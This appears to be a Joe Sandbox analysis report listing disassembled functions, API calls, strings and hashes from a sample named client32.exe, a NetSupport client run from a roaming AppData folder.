Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
API String ID: 2251294070-1743495995
Opcode ID: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
Opcode Fuzzy Hash: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780

Function 110D0960 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 110D097A

Strings

*this==pszSrc, xrefs: 110D09BF
..\CTL32\NSMString.cpp, xrefs: 110D09BA

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __strdup
String ID: *this==pszSrc$..\CTL32\NSMString.cpp
API String ID: 838363481-1175285396
Opcode ID: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
Instruction ID: 29c62dc5338ff495c898086ff50a52fd619e2258fc3847dfd771a07a915be9b0
Opcode Fuzzy Hash: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
Instruction Fuzzy Hash: 95F028B5E003525BEA00DE6AB804A9BFBD89FC2298F44847AE8DDE7311E570B405C6D4

Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11110239

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_memset.LIBCMT ref: 11110262

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\Refcount.cpp, xrefs: 1111024C

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6

Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8

Strings

\\.\NSWFPDrv, xrefs: 11015592

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0

Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1115CCC3

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90

Function 6CEF09A9 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CEF1E32,00000001,?,00000000,00000000,00000000,?,6CF175BC,00000001,00000214), ref: 6CEF09E8
_errno.MSVCR100(?,6CEF1E32,00000001,?,00000000,00000000,00000000,?,6CF175BC,00000001,00000214), ref: 6CF1F3D7

Memory Dump Source

Source File: 00000003.00000002.3710952050.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000003.00000002.3710934142.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711022108.000000006CF94000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711041416.000000006CF96000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711061539.000000006CF99000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cee0000_client32.jbxd

Similarity

API ID: AllocateHeap_errno
String ID:
API String ID: 242259997-0
Opcode ID: 1b551e25b4f457861c406c1681075db405b643f9a8a1deeeadb2b3e712310569
Instruction ID: b6efda4d40442e7e321e24ae1d67df3e587959b8c364b0f4373b70b99d81d560
Opcode Fuzzy Hash: 1b551e25b4f457861c406c1681075db405b643f9a8a1deeeadb2b3e712310569
Instruction Fuzzy Hash: 1701F53135A2D59BFF449F29C844B6B37B89F82359F208229A835CBDD1EB30D441C750

Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
__wsplitpath.LIBCMT ref: 11112185

Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46

GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5

Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28

Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,`(,?,00000001,00000001), ref: 1109EDB0
Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00EB2860,?,00000001,00000001), ref: 1109EDC3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50

Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542

Strings

??CTL32.DLL, xrefs: 11069503

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91

Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110271CD

Strings

?:\, xrefs: 110271C2

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91

Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d Opening regkey %s, xrefs: 110ED54A

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0

Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d closing regkey %x, xrefs: 110ED4FD

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764

Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,02AEB8C8,?,?,?,00000100,?,?,00000009), ref: 11146FF9

Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A

Strings

NSMTRACE, xrefs: 11146FF4

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
